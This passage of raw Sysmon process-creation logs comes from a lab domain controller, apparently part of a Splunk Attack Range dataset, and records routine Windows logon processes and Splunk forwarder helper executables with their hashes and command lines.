Manager\DWM-2{A8622C2F-41C9-6078-E6D0-210000000000}0x21d0e62SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exewinlogon.exe 154100x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:17.277{A8622C2F-41C9-6078-AA03-00000000AE01}2264C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a6a855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exewinlogon.exe 154100x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:16.620{A8622C2F-41C8-6078-A603-00000000AE01}4600C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{A8622C2F-41C8-6078-A403-00000000AE01}736C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000b0 0000007c 154100x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:16.563{A8622C2F-41C8-6078-A503-00000000AE01}2692C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating 
SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{A8622C2F-41C8-6078-A403-00000000AE01}736C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000b0 0000007c 154100x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:38:16.555{A8622C2F-41C8-6078-A403-00000000AE01}736C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000b0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{A8622C2F-3DE9-6078-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 154100x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:26.351{A8622C2F-4196-6078-3303-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:25.085{A8622C2F-4195-6078-3203-00000000AE01}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:24.413{A8622C2F-4194-6078-3103-00000000AE01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:23.741{A8622C2F-4193-6078-3003-00000000AE01}4840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:22.585{A8622C2F-4192-6078-2E03-00000000AE01}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:21.789{A8622C2F-4191-6078-2C03-00000000AE01}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:37:21.085{A8622C2F-4191-6078-2B03-00000000AE01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:26.461{A8622C2F-415A-6078-FA02-00000000AE01}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:25.070{A8622C2F-4159-6078-F702-00000000AE01}1376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:24.398{A8622C2F-4158-6078-F502-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:23.728{A8622C2F-4157-6078-F302-00000000AE01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:22.572{A8622C2F-4156-6078-F002-00000000AE01}4344C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:21.867{A8622C2F-4155-6078-EA02-00000000AE01}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:36:21.086{A8622C2F-4155-6078-E502-00000000AE01}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:26.430{A8622C2F-411E-6078-7802-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:25.104{A8622C2F-411D-6078-7502-00000000AE01}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:24.602{A8622C2F-411C-6078-7402-00000000AE01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:23.790{A8622C2F-411B-6078-6F02-00000000AE01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:35:22.680{A8622C2F-411A-6078-6A02-00000000AE01}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
154100x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:28:21.193{A8622C2F-3F75-6078-FD00-00000000AE01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:26.452{A8622C2F-3F3E-6078-FC00-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:25.171{A8622C2F-3F3D-6078-FB00-00000000AE01}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:24.467{A8622C2F-3F3C-6078-FA00-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:23.795{A8622C2F-3F3B-6078-F900-00000000AE01}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:22.670{A8622C2F-3F3A-6078-F800-00000000AE01}2648C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:21.967{A8622C2F-3F39-6078-F700-00000000AE01}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:27:21.186{A8622C2F-3F39-6078-F600-00000000AE01}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:26.426{A8622C2F-3F02-6078-F500-00000000AE01}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:25.129{A8622C2F-3F01-6078-F400-00000000AE01}3764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
